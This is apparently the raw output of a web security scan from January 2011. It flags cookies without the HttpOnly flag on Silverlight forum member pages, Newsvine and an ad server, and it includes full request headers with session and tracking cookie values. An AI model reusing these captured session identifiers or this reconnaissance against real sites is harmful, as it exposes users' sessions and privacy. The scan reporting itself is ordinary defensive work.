GET /members/sladapter.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsladapter.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:41 GMT; expires=Sun, 29-Jan-2012 23:15:41 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:41 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsladapter.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:35 GMT; expires=Sun, 29-Jan-2012 23:16:35 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/snelldl.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 235 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsnelldl.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:35 GMT; expires=Sun, 29-Jan-2012 23:16:35 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:35 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsnelldl.asp ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:31 GMT; expires=Sun, 29-Jan-2012 23:16:31 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/sniles.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsniles.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:31 GMT; expires=Sun, 29-Jan-2012 23:16:31 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:31 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsniles.aspx ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:13 GMT; expires=Sun, 29-Jan-2012 23:16:13 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/swo.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 231 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fswo.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:13 GMT; expires=Sun, 29-Jan-2012 23:16:13 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:13 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fswo.aspx">h ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/syed-amjad.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsyed-amjad.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:00 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsyed-amjad. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:05 GMT; expires=Sun, 29-Jan-2012 23:17:05 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/tanmoy.r.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 236 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2ftanmoy.r.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:05 GMT; expires=Sun, 29-Jan-2012 23:17:05 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:05 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2ftanmoy.r.as ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/thaicarrot.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fthaicarrot.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fthaicarrot. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/vikasamin.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fvikasamin.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:00 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fvikasamin.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/yifung.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fyifung.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:07 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fyifung.aspx ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 23207 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:21:00 GMT; expires=Sun, 29-Jan-2012 23:21:00 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:41:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:21:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /user/profile.aspx?UserID=96252 HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 249 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3fUserID%3d96252 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:20 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /user/viewonline.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 278417 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:19 GMT; expires=Sun, 29-Jan-2012 23:17:19 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:19 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: health.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:46:55 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA19 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 36431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http:// ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: helenaspopkin.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:07:18 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ingame.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:07:24 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com Location: http://ingame.msnbc.msn.com/ Content-Length: 2 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Vermont-12.4.0-1012 var rsi_now= new Date(); var rsi_csid= 'A06546';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: latino.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=merchant_cs=1&betq=11325=420981 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.merchantcircle.com/corporate/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; 